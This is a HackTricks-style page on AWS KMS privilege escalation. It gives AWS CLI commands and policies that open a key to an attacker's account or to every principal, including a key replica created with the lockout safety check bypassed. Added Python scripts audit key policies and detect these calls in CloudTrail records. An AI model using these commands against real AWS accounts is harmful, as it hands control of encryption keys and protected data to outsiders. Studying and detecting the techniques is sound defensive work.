AWS - KMS Privesc
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
KMS
For more information about KMS check:
kms:ListKeys,kms:PutKeyPolicy, (kms:ListKeyPolicies, kms:GetKeyPolicy)
With these permissions it is possible to change the permissions of a key so that it can be used by other accounts or even by anyone:
aws kms list-keys
aws kms list-key-policies --key-id <id> # Although only 1 max per key
aws kms get-key-policy --key-id <id> --policy-name <policy_name>
# AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default")
aws kms put-key-policy --key-id <id> --policy-name <policy_name> --policy file:///tmp/policy.json
policy.json:
{
    "Version": "2012-10-17",
    "Id": "key-consolepolicy-3",
    "Statement": [
        {
            "Sid": "Enable IAM User Permissions",
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::<origin_account>:root"
            },
            "Action": "kms:*",
            "Resource": "*"
        },
        {
            "Sid": "Allow all use",
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::<attackers_account>:root"
            },
            "Action": ["kms:*"],
            "Resource": "*"
        }
    ]
}
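The defender's counterpart to the policy above is a check that walks every Allow statement of a key policy and reports principals that do not belong to the key owner's account, or that are wildcards. The following script is an added example (not HackTricks code); the two sample policies are constructed, modelled on the policy.json above, and the 12-digit account IDs `111111111111` (trusted owner) and `222222222222` (foreign account) are placeholders. It accepts the string and list forms IAM allows for `Principal`, `Action` and `Statement`, and handles the bare-account-ID and STS ARN principal forms as well as the `arn:aws:iam::<account>:root` form shown on the page.

```python
import json
import re

# Constructed sample policies modelled on the policy.json above. The account
# IDs are placeholders (assumption), not real accounts.
TRUSTED_ACCOUNT = "111111111111"

CROSS_ACCOUNT_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Id": "key-consolepolicy-3",
    "Statement": [
        {
            "Sid": "Enable IAM User Permissions",
            "Effect": "Allow",
            "Principal": {"AWS": "arn:aws:iam::111111111111:root"},
            "Action": "kms:*",
            "Resource": "*",
        },
        {
            "Sid": "Allow all use",
            "Effect": "Allow",
            "Principal": {"AWS": "arn:aws:iam::222222222222:root"},
            "Action": ["kms:*"],
            "Resource": "*",
        },
    ],
})

# A policy that opens the key to every AWS principal.
WILDCARD_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "Open", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": "kms:*", "Resource": "*"},
    ],
})

# Matches IAM/STS principal ARNs and captures the 12-digit account ID.
_ARN_ACCOUNT = re.compile(r"^arn:aws:(?:iam|sts)::(\d{12}):")


def _as_list(value):
    """IAM allows most elements to be a string or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _principals(stmt):
    """Flatten the Principal element ("*" or {"AWS": ..., "Service": ...}) to strings."""
    principal = stmt.get("Principal")
    if isinstance(principal, str):
        return [principal]
    out = []
    for values in (principal or {}).values():
        out.extend(_as_list(values))
    return out


def audit_key_policy(policy_json, trusted_account):
    """Return one finding per Allow statement that grants access to a principal
    outside trusted_account, or to everyone. Service principals such as
    logs.amazonaws.com carry no account ID and are not flagged here."""
    findings = []
    for stmt in _as_list(json.loads(policy_json).get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        sid = stmt.get("Sid", "<no sid>")
        actions = _as_list(stmt.get("Action"))
        for principal in _principals(stmt):
            if principal == "*":
                reason = "wildcard principal"
            else:
                match = _ARN_ACCOUNT.match(principal)
                if match:
                    account = match.group(1)
                elif re.fullmatch(r"\d{12}", principal):
                    account = principal          # bare account ID form
                else:
                    continue                     # service/federated principal
                if account == trusted_account:
                    continue
                reason = f"principal belongs to account {account}, not {trusted_account}"
            findings.append({"sid": sid, "principal": principal,
                             "actions": actions, "reason": reason})
    return findings


if __name__ == "__main__":
    for policy in (CROSS_ACCOUNT_POLICY, WILDCARD_POLICY):
        for f in audit_key_policy(policy, TRUSTED_ACCOUNT):
            print(f"[{f['sid']}] {f['principal']} -> {f['actions']}: {f['reason']}")
```

In practice the input comes from `aws kms get-key-policy --key-id <id> --policy-name default --output text` run over every key from `aws kms list-keys`; any finding on a key that is not deliberately shared cross-account is worth an alert, and a wildcard principal on a KMS key should never be silently accepted.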
kms:CreateGrant
This allows the principal to use the KMS key:
aws kms create-grant \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
--grantee-principal arn:aws:iam::123456789012:user/exampleUser \
--operations Decrypt
warning
A grant can only allow certain kinds of operations: https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations
warning
Note that it can take a few minutes for KMS to let the user use the key after the grant has been created. Once that time has passed, the principal can use the KMS key without needing to specify anything.
However, if the grant needs to be used right away, use a grant token (see the following code).
For more details read this.
# Use the grant token in a request
aws kms generate-data-key \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
--key-spec AES_256 \
--grant-tokens $token
Note that it is possible to list the grants of a key with:
aws kms list-grants --key-id <value>
kms:CreateKey, kms:ReplicateKey
With these permissions it is possible to replicate a KMS key that is enabled for multi-region into a different region with a different policy.
Therefore, an attacker could use this to privesc their access to the key and use it.
aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml
{
    "Version": "2012-10-17",
    "Id": "key-consolepolicy-3",
    "Statement": [
        {
            "Sid": "Enable IAM User Permissions",
            "Effect": "Allow",
            "Principal": {
                "AWS": "*"
            },
            "Action": "kms:*",
            "Resource": "*"
        }
    ]
}
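All three of the escalation paths on this page (`CreateGrant`, `PutKeyPolicy`, `ReplicateKey`) are KMS control-plane calls that CloudTrail records, so a detection rule can key on them. The script below is an added example (not HackTricks code) that runs such a rule over a handful of constructed CloudTrail-style records: the account IDs, key IDs and user names are placeholders, and the camelCase `requestParameters` field names (`granteePrincipal`, `operations`, `policyName`, `replicaRegion`, `bypassPolicyLockoutSafetyCheck`) are assumed to follow CloudTrail's usual mapping of the API parameters. It flags a grant whose grantee lives in a different account than the key, any key-policy replacement, and a replica created with the policy lockout safety check bypassed.

```python
import re

# Constructed CloudTrail-style records for the KMS API calls discussed on this
# page. Field names follow CloudTrail's camelCase requestParameters (assumption);
# account IDs, key IDs and user names are placeholders.
ACCOUNT = "111111111111"
KEY_ARN = f"arn:aws:kms:us-east-1:{ACCOUNT}:key/1234abcd-12ab-34cd-56ef-1234567890ab"

SAMPLE_EVENTS = [
    {   # grant to a role in the same account: normal application behaviour
        "eventSource": "kms.amazonaws.com", "eventName": "CreateGrant",
        "recipientAccountId": ACCOUNT,
        "userIdentity": {"arn": f"arn:aws:iam::{ACCOUNT}:user/alice"},
        "requestParameters": {"keyId": KEY_ARN,
                              "granteePrincipal": f"arn:aws:iam::{ACCOUNT}:role/app-role",
                              "operations": ["Decrypt"]},
    },
    {   # grant to a principal in a foreign account
        "eventSource": "kms.amazonaws.com", "eventName": "CreateGrant",
        "recipientAccountId": ACCOUNT,
        "userIdentity": {"arn": f"arn:aws:iam::{ACCOUNT}:user/bob"},
        "requestParameters": {"keyId": KEY_ARN,
                              "granteePrincipal": "arn:aws:iam::222222222222:user/exampleUser",
                              "operations": ["Decrypt"]},
    },
    {   # the key policy was replaced
        "eventSource": "kms.amazonaws.com", "eventName": "PutKeyPolicy",
        "recipientAccountId": ACCOUNT,
        "userIdentity": {"arn": f"arn:aws:iam::{ACCOUNT}:user/bob"},
        "requestParameters": {"keyId": KEY_ARN, "policyName": "default"},
    },
    {   # multi-region replica created while bypassing the lockout safety check
        "eventSource": "kms.amazonaws.com", "eventName": "ReplicateKey",
        "recipientAccountId": ACCOUNT,
        "userIdentity": {"arn": f"arn:aws:iam::{ACCOUNT}:user/bob"},
        "requestParameters": {"keyId": "mrk-c10357313a644d69b4b28b88523ef20c",
                              "replicaRegion": "eu-west-3",
                              "bypassPolicyLockoutSafetyCheck": True},
    },
    {   # ordinary data-plane use of the key: ignored by this rule
        "eventSource": "kms.amazonaws.com", "eventName": "Decrypt",
        "recipientAccountId": ACCOUNT,
        "userIdentity": {"arn": f"arn:aws:iam::{ACCOUNT}:role/app-role"},
        "requestParameters": {"keyId": KEY_ARN},
    },
]

_ARN_ACCOUNT = re.compile(r"^arn:aws:(?:iam|sts)::(\d{12}):")


def account_of(arn):
    """Return the account ID embedded in an IAM/STS principal ARN, or None."""
    match = _ARN_ACCOUNT.match(arn or "")
    return match.group(1) if match else None


def detect_kms_privesc(events):
    """Flag KMS control-plane calls that change who can use a key."""
    findings = []
    for ev in events:
        if ev.get("eventSource") != "kms.amazonaws.com":
            continue
        name = ev.get("eventName")
        params = ev.get("requestParameters") or {}
        base = {"eventName": name, "keyId": params.get("keyId", "<unknown key>"),
                "actor": (ev.get("userIdentity") or {}).get("arn", "<unknown>")}
        if name == "CreateGrant":
            grantee = params.get("granteePrincipal", "")
            grantee_account = account_of(grantee)
            # Grants to the key's own account are routine; foreign or
            # unparseable grantees are not.
            if grantee_account != ev.get("recipientAccountId"):
                findings.append({**base, "severity": "high",
                                 "detail": f"grant for {params.get('operations')} to {grantee} "
                                           f"(account {grantee_account})"})
        elif name == "PutKeyPolicy":
            findings.append({**base, "severity": "medium",
                             "detail": f"key policy {params.get('policyName')!r} replaced"})
        elif name == "ReplicateKey":
            bypass = bool(params.get("bypassPolicyLockoutSafetyCheck"))
            findings.append({**base, "severity": "high" if bypass else "medium",
                             "detail": f"replica created in {params.get('replicaRegion')}"
                                       + (" with policy lockout safety check bypassed" if bypass else "")})
    return findings


if __name__ == "__main__":
    for f in detect_kms_privesc(SAMPLE_EVENTS):
        print(f"{f['severity']:6} {f['eventName']:12} {f['actor']} {f['keyId']}: {f['detail']}")
```

The same-account `CreateGrant` is deliberately not flagged: services such as EBS and RDS create grants constantly, so alerting on every grant produces noise, while a grantee outside the key's account is rare enough to review every time. `PutKeyPolicy` and `ReplicateKey` are infrequent enough in most accounts to review unconditionally, and the bypass flag raises the severity because it is exactly what lets the replica ship with a policy the owner can no longer manage.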
kms:Decrypt
This permission allows using the key to decrypt some information.
For more information check: